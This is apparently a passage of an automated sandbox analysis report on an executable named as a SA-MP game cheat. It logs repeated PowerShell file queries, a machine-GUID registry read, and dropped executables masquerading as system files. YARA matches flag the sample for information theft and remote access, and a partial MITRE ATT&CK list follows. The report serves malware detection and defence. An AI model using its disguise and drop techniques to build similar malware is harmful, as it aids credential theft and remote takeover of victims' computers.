                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeQueries volume information: C:\msportComWin\BridgePortsurrogateserverref.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exeQueries volume information: C:\msportComWin\BridgePortsurrogateserverref.exe VolumeInformation
                                    Source: C:\Recovery\services.exeQueries volume information: C:\Recovery\services.exe VolumeInformation
                                    Source: C:\Recovery\services.exeQueries volume information: C:\Recovery\services.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00D0DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00D0DF1E
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exeCode function: 0_2_00CFB146 GetVersionExW,0_2_00CFB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BridgePortsurrogateserverref.exe PID: 4340, type: MEMORYSTR
Source: Yara match | File source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, type: SAMPLE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.BridgePortsurrogateserverref.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1259094953.0000000006ACE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1259921924.00000000073D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1285212677.0000000000F12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: C:\Recovery\services.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, type: DROPPED
Source: Yara match | File source: C:\msportComWin\BridgePortsurrogateserverref.exe, type: DROPPED
Source: Yara match | File source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, type: SAMPLE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.BridgePortsurrogateserverref.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Recovery\services.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, type: DROPPED
Source: Yara match | File source: C:\msportComWin\BridgePortsurrogateserverref.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 0000000A.00000002.1622516211.0000000013530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BridgePortsurrogateserverref.exe PID: 4340, type: MEMORYSTR
Source: Yara match | File source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, type: SAMPLE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.BridgePortsurrogateserverref.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1259094953.0000000006ACE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1259921924.00000000073D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.1285212677.0000000000F12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match | File source: C:\Recovery\services.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, type: DROPPED
Source: Yara match | File source: C:\msportComWin\BridgePortsurrogateserverref.exe, type: DROPPED
Source: Yara match | File source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe, type: SAMPLE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.BridgePortsurrogateserverref.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.6b1c6f9.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.SAMP_CHEAT_ATVECHAU2.exe.bin.exe.74256f9.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Recovery\services.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe, type: DROPPED
Source: Yara match | File source: C:\msportComWin\BridgePortsurrogateserverref.exe, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic column; the number in parentheses is the count shown next to the technique in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Scripting (11); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
